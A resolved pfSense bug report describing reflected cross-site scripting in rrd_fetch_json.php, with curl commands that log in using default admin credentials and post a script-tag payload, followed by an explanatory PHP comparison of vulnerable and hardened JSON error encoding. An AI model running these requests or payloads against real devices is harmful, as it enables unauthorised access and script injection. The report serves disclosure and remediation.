Bug #9601
rrd_fetch_json.php does not encode errors returned by the RRD module.
Status: Resolved
Priority: Normal
Assignee:
Category: Status_Monitoring
Target version:
Start date: 06/25/2019
Due date:
% Done: 100%
Estimated time:
Plus Target Version:
Affected Version: All
Affected Plus Version:
Affected Architecture: All
Description
If rrd_fetch() produces an error, this error is sent back in JSON without any processing. If the user creates a specially-crafted set of parameters, the contents of the error may include user input.

In particular, sending timePeriod=i3i3j<script>alert('XSS')</script>tz9b1 in a POST string will result in an error which includes the original input:

{ "error" : "start time: unparsable time: endi3i3j<script>alert('XSS')</script>tz9b1+5min" }
Easiest method to reproduce:

curl -L -k --cookie-jar cookies.txt \
  https://192.168.1.1/ \
  | grep "name='__csrf_magic'" \
  | sed 's/.*value="\(.*\)".*/\1/' > csrf.txt

curl -L -k --cookie cookies.txt --cookie-jar cookies.txt \
  --data-urlencode "login=Login" \
  --data-urlencode "usernamefld=admin" \
  --data-urlencode "passwordfld=pfsense" \
  --data-urlencode "__csrf_magic=$(cat csrf.txt)" \
  https://192.168.1.1/ > /dev/null

curl -L -k --cookie cookies.txt --cookie-jar cookies.txt \
  -d "left=system-processor&right=null&start=&end=&resolution=300&timePeriod=i3i3j<script>alert('XSS')</script>tz9b1&graphtype=line&invert=true&refreshInterval=0" \
  https://192.168.1.1/rrd_fetch_json.php
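The following is an added illustration, not code from pfSense's rrd_fetch_json.php: it shows the pattern the report describes (an rrd_fetch() error string that still contains the caller's timePeriod value being spliced straight into the JSON body) next to a hardened version that lets json_encode() build the document with the JSON_HEX_* flags. The function names rrd_error_unsafe() and rrd_error_safe() are hypothetical, and the sample error message is the one quoted above.

```php
<?php
// Added example, not pfSense's own code. Demonstrates how an rrd_fetch()
// error that still contains user input reaches the JSON response, and one
// way to make the response inert. Function names are hypothetical.

// Vulnerable pattern: the error text is spliced into a hand-built JSON
// string, so whatever the caller put in timePeriod comes back verbatim.
// An embedded double quote in $err would also break the JSON itself.
function rrd_error_unsafe(string $err): string
{
    return '{ "error" : "' . $err . '" }';
}

// Hardened pattern: json_encode() builds the document, and the JSON_HEX_*
// flags emit < > & ' " as \uXXXX escapes. A JSON consumer still decodes the
// same text, but the raw response body no longer contains an HTML tag that
// a browser, or a client that drops data.error into innerHTML, could run.
function rrd_error_safe(string $err): string
{
    return json_encode(
        ['error' => $err],
        JSON_HEX_TAG | JSON_HEX_AMP | JSON_HEX_APOS | JSON_HEX_QUOT
    );
}

// Constructed sample: the message the report quotes for the crafted timePeriod.
$err = "start time: unparsable time: endi3i3j<script>alert('XSS')</script>tz9b1+5min";

// Declare the body as JSON so the browser never renders it as a document.
header('Content-Type: application/json');

echo rrd_error_unsafe($err), "\n";
echo rrd_error_safe($err), "\n";
```

With JSON_HEX_TAG, every `<` in the value is emitted as `\u003C` and every `>` as `\u003E`, so re-running the third curl command from the reproduction above should show no literal `<script>` in the response body once the endpoint is built this way. Passing the message through htmlspecialchars() before json_encode() is the coarser alternative; it also neutralises the tags, but it changes the string the client receives rather than just its encoding on the wire.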